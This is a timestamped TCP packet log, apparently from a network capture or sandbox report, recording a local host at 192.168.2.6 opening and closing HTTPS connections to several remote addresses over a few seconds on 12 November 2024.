                                                        Nov 12, 2024 16:27:09.895704031 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.895740032 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.896282911 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.896289110 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.907275915 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.907306910 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:09.907824993 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:09.907833099 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.003411055 CET49705443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:10.003572941 CET49705443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:10.004272938 CET49805443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:10.004308939 CET44349805173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:27:10.004545927 CET49805443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:10.004909992 CET49805443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:10.004924059 CET44349805173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:27:10.008781910 CET44349705173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:27:10.008905888 CET44349705173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:27:10.020620108 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.021008015 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.021075010 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.021200895 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.021212101 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.021224022 CET49800443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.021228075 CET4434980013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.024032116 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.024060011 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.024332047 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.024672985 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.024688005 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.034852982 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.035381079 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.035455942 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.035497904 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.035497904 CET49801443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.035523891 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.035535097 CET4434980113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.038050890 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.038081884 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.038141012 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.038279057 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.038292885 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.075896025 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.076428890 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.076446056 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.076936007 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.076941967 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.130278111 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.130812883 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.130830050 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.131328106 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.131333113 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.206513882 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.206640005 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.206819057 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.206878901 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.206892967 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.206904888 CET49799443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.206909895 CET4434979913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.209948063 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.209989071 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.210108995 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.210313082 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.210330009 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.264180899 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.264249086 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.264318943 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.264611006 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.264624119 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.264632940 CET49802443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.264636993 CET4434980213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.267889977 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.267911911 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.268037081 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.268202066 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.268213034 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.275473118 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.275901079 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.275919914 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.276403904 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.276412964 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.409219980 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.409612894 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.410243034 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.411128998 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.411155939 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.411173105 CET49803443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.411180019 CET4434980313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.414520025 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.414550066 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.414627075 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.414874077 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.414886951 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.479075909 CET49721443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:27:10.479088068 CET44349721142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:27:10.642663956 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:27:10.642735958 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:27:10.642894030 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:27:10.704077959 CET44349805173.222.162.64192.168.2.6
                                                        Nov 12, 2024 16:27:10.704171896 CET49805443192.168.2.6173.222.162.64
                                                        Nov 12, 2024 16:27:10.757652998 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.758378983 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.758399010 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.760350943 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.760359049 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.773008108 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.773407936 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.773423910 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.773848057 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.773854971 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.888374090 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.888721943 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.888955116 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.889039993 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.889051914 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.889060020 CET49806443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.889065027 CET4434980613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.892180920 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.892210007 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.892287016 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.892429113 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.892441034 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.903831959 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.904275894 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.904321909 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.904375076 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.904388905 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.904402018 CET49807443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.904407978 CET4434980713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.907170057 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.907187939 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.907237053 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.907423019 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.907439947 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.942336082 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.942759991 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.942773104 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:10.943274975 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:10.943279982 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.006028891 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.006658077 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.006671906 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.007186890 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.007191896 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.073206902 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.073369026 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.073424101 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.073766947 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.073780060 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.073791027 CET49808443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.073797941 CET4434980813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.079476118 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.079508066 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.079571962 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.079782009 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.079797029 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.139046907 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.139309883 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.139379025 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.139463902 CET49809443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.139472961 CET4434980913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.142302036 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.142344952 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.142508984 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.142662048 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.142674923 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.178716898 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.179171085 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.179183960 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.179687977 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.179694891 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.314466000 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.314867020 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.314953089 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.314986944 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.315001011 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.315011978 CET49810443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.315017939 CET4434981013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.318576097 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.318602085 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.318666935 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.318871021 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.318886995 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.626521111 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.628194094 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.628217936 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.628758907 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.628767967 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.641412020 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.642070055 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.642091990 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.642569065 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.642575026 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.712965012 CET49715443192.168.2.6104.20.7.133
                                                        Nov 12, 2024 16:27:11.712986946 CET44349715104.20.7.133192.168.2.6
                                                        Nov 12, 2024 16:27:11.762667894 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.763717890 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.763916969 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.763956070 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.763956070 CET49811443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.763967991 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.763978004 CET4434981113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.767308950 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.767354965 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.767577887 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.767579079 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.767610073 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.774475098 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.774538994 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.774816036 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.775454044 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.775464058 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.775494099 CET49812443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.775500059 CET4434981213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.778096914 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.778122902 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.778295040 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.780198097 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.780213118 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.800966978 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.801918983 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.801918983 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.801944971 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.801954985 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.863815069 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.864731073 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.864731073 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.864744902 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.864761114 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.929671049 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.929758072 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.930006027 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.930006027 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.930057049 CET49813443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.930066109 CET4434981313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.933098078 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.933125973 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.933350086 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.933494091 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.933505058 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.992224932 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.992270947 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.992362022 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.992641926 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.992660046 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.992701054 CET49814443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.992706060 CET4434981413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.995949984 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.995970011 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:11.996225119 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.996225119 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:11.996246099 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.047825098 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.048870087 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.048870087 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.048888922 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.048903942 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.177536011 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.177860975 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.177961111 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.177961111 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.178066015 CET49815443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.178076982 CET4434981513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.181085110 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.181113958 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.181330919 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.181330919 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.181360006 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.493833065 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.494563103 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.494581938 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.495009899 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.495013952 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.499946117 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.500309944 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.500335932 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.500701904 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.500709057 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.623596907 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.623991966 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.624053001 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.624116898 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.624135017 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.624159098 CET49816443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.624165058 CET4434981613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.627626896 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.627666950 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.627758980 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.627846956 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.627927065 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.627990961 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.628029108 CET49821443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.628046036 CET4434982113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.628117085 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.628117085 CET49817443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.628129959 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.628139973 CET4434981713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.630439043 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.630472898 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.630539894 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.630683899 CET49822443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.630698919 CET4434982213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.677815914 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.678437948 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.678467035 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.679095984 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.679101944 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.743756056 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.744368076 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.744391918 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.744885921 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.744890928 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.809315920 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.809482098 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.809568882 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.809730053 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.809745073 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.809757948 CET49818443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.809762955 CET4434981813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.813246012 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.813286066 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.813551903 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.813720942 CET49823443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.813736916 CET4434982313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.873745918 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.874089003 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.874147892 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.874182940 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.874196053 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.874207973 CET49819443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.874213934 CET4434981913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.877603054 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.877643108 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.877882957 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.878048897 CET49824443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.878062963 CET4434982413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.938488007 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.938956022 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.939002037 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:12.939569950 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:12.939575911 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.067161083 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.067222118 CET4434982013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:13.067286968 CET49820443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:13.067555904 CET49820443192.168.2.613.107.246.45
